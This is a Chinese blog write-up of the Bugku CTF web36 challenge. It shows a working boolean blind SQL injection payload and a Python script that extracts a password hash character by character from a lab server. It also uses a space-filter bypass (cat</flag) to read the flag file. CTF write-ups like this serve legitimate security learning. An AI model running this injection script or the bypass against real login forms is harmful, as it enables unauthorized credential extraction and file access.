Bugku:web36

最新推荐文章于 2021-11-03 16:12:23 发布
最新推荐文章于 2021-11-03 16:12:23 发布
阅读量496 收藏 2
点赞数
分类专栏: Bugku CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/113704048
版权

有一个登录页面,习惯性先扫扫
在这里插入图片描述
在这里插入图片描述
查看一些include发现存在文件
在这里插入图片描述
点击进去看不见什么代码,然后再看看别的东西

/images

里面存在提示。这题应该是有注入的漏洞。
在这里插入图片描述
当user进行输入的时候,会转换成0,直接输入0时,是没有值的。但是我们可以通过闭合字符串来实现。
在这里插入图片描述
构造'-0-',对user=’’=0进行闭合。

user=''=0
user=''-0-''=0

在这里插入图片描述
此时我们可以构造sql语句来获得密码
(这里我不会写,去别的师傅wp看的)

 admin'-(ascii(MID((passwd)from("+str(i)+")))="+str(ord(j))+")-'

首先闭合admin然后后面的这段表示对passwd这列进行字段的提取。

若ascii(MID((passwd)from(“1”)))="+str(ord(0))+"成立为‘真’转换成为数字型1,反之为0,payload转换为admin’-1-’ 和 admin’-0-’ 形式
通过判断返回内容是否存在username error!!@_@"来确定条件是否为真

然后利用一下别的师傅写的脚本(https://blog.csdn.net/qq_45774670/article/details/109366269

#!-*-coding:utf-8-*-
import requests
url = "http://114.67.246.176:15531/login.php"
cookie = {
    'PHPSESSID':'6jbkaich9501usgf33jrpp32h2'
}

password = ""
for i in range(1,33):
    for j in '0123456789abcdef':
        payload = "admin'-(ascii(MID((passwd)from("+str(i)+")))="+str(ord(j))+")-'"
        data = {
            'uname': payload,
            'passwd': '123'
        }
        r = requests.post(url=url,cookies=cookie,data=data)
        #print r.content
        if "username error!!@_@" in r.content.decode():
            password += j
            print(password)
            break

得到md5字符串。
在这里插入图片描述
https://www.somd5.com/解密网站
得到bugkuctf
登录:账号为'-0-',密码就是bugkuctf
在这里插入图片描述
ls发现文件
在这里插入图片描述
这里空格被过滤,但是我们可以构造

cat</flag

直接找到flag
在这里插入图片描述

FW_ENJOEY
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1306
ctfshow web29 web30 web31
CTFshow 命令执行 web36
Kradress的博客
10-29 130
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 04:21:16 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){
第三章顺序程序设计
qq_44595344的博客
01-23 215
顺序程序设计例3.1华氏温度转化为摄氏温度例3.2计算存款利息例3.3给定一个大写字母,要求用小写字母输出例3.4给出三角形的三边长,求三角形面积例3.5求a*x^2+b*x+c=0方程的根例3.6用%f输出实数,只能得到6位小数例3.7float型数据的有效位数例3.8先后输出BOY三个字符例3.9从键盘输入3个字符,然后把它们输出到屏幕例3.10从键盘上输入一个大写字母,在显示屏上显示对应的小...
Bugku CTF web36(Web)
ChaoYue_miku的博客
03-19 317
0、打开网页,查看题目描述 描  述:全都过滤了绝望吗? 根据描述,说明是盲注 1、编写python脚本,运行获取密码 import requests session = requests.Session() url="http://114.67.246.176:15649//login.php" flag='' for i in range(1,250): left=32 right=128 mid=(left+right)//2 .
bugkuweb36 全都过滤了绝望吗?
EC_Carrot的博客
12-28 1257
进去是个登录界面,稍微按了按导航栏没什么用,猜测是注入! 输入用户admin密码任意,显示password错误 输入用户admin'密码任意,显示username错误 输入用户admin'#密码任意,发现给检测到入侵,那#用不了,试了试-和+也被过滤了 那这里就能看出是盲注了,放脚本: # -*- coding: utf-8 -*- import requests session = requests.Session() url="http://114.67.246.176:12012/login.php
bugku题的web类解析
01-29
这个是我自习写的bugku的web的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-WEB-web36
fallingskies
01-06 837
使用御剑扫描目录 访问/include 看到filter.php,应该是过滤代码,但是看不到 0.0 访问/images 有图片提示 根据提示,字符串在比较时会转化为0 构造如下 通过判断 构造'!=(ascii(mid((passwd)from(1)))=48)-'来获取passwd 使用burpsuite intruder 再将ascii码转化为字符 得到passwd=4dcc88f8f1bc05e7c2ad1a60288481a2 .
bugkuCTF Writeup (Web)36-40
Troublor的博客
02-01 3112
求getshell 文件上传绕过 上传一个php文件 用burp抓包 头部的Content-Type改成Multipart/form-data大小写绕过 请求内容里的Content-Type改成image 文件名改成php5 就绕过了 不太明白Multipart/form-data这里为什么变成大写能绕过,网上查也没查到,似乎并没有人关心multipart/form-dat
ctfshow-命令执行-web36
weixin_43400535的博客
11-03 2889
ctfshow-web36 提示:ctfshow靶场命令执行wp 文章目录ctfshow-web36题目描述:原理:审计:方法 :思路:尝试使用web35的方法,将变量1换成a代替,绕过数字的过滤-----使用字母代替数字的索引。Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @La
BugKuCTF WEB web4
无限迭代中......
07-09 607
http://123.206.87.240:8002/web4/ 题解: 审查元素 拼凑 eval(%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e...
BUGKU-WEB-WEB41
qq_25755011的博客
04-21 1348
一道反序列化字符串逃逸+ssrf的综合题 解题思路 字符串逃逸 题目源码如下: <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; }
bugku web web3
weixin_30576859的博客
02-20 230
flag就在这里快来找找吧http://123.206.87.240:8002/web3/ 点进去这个页面可以看到不断地有提示 flag就在这里 来找找吧 那就找一找哇 在source中可以找到一行注释 &#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&amp...
BugkuCTF-WEB-第1题到第42题
Alita_lxz的博客
10-12 2308
BugkuCTF-WEB https://ctf.bugku.com/challenges 1.web2 题目地址:http://123.206.87.240:8002/web2/ F12看一下 flag就在里面 2.计算器 题目地址:http://123.206.87.240:8002/yanzhengma/ 文本框限制了输入,F12改一下 成功获得flag 3.web基础$_GET 题目地址:http://123.206.87.240:8002/get/ GET传参,如果what=flag,输出
Bugku Web33
JJT
05-13 226
Bugku Web33 描述:fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA= 下载文件,是一段php代码,提示给的字符串应该就是flag加密后得到的字符串,现在需要对其解密,得到flag,代码如下 <?php function encrypt($data,$key) { $key = md5('ISCC'); #729623334f0aa2784a1599fd374c120d $x = 0; $len = strle
BugkuCTF web_31-40
H4ppyD0g的博客
08-11 566
31 md5 collision(NUPT_CTF) 题目有md5提示,所以找一个md5值是0e开头的看看 get传参?a=240610708拿到flag。 ———————————— 32 程序员本地网站 伪造XFF头就行了 ———————————— 33 各种绕过 sha1() 函数计算字符串的 SHA-1 散列。 sha1只对字符型进行处理,是数组的话返回false,所以让两个值都为数组就可以...
Bugku CTF杂项实战:远程木马、Web漏洞与神秘图片解析
2. **Web漏洞**:这一题考察的是Web安全防护的漏洞检测。通过Python脚本分析服务器的日志文件(access.log),查找特定模式(如"flag"关键字后面紧跟一个非法字符序列),然后解码获取机密信息。这涉及到HTTP协议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值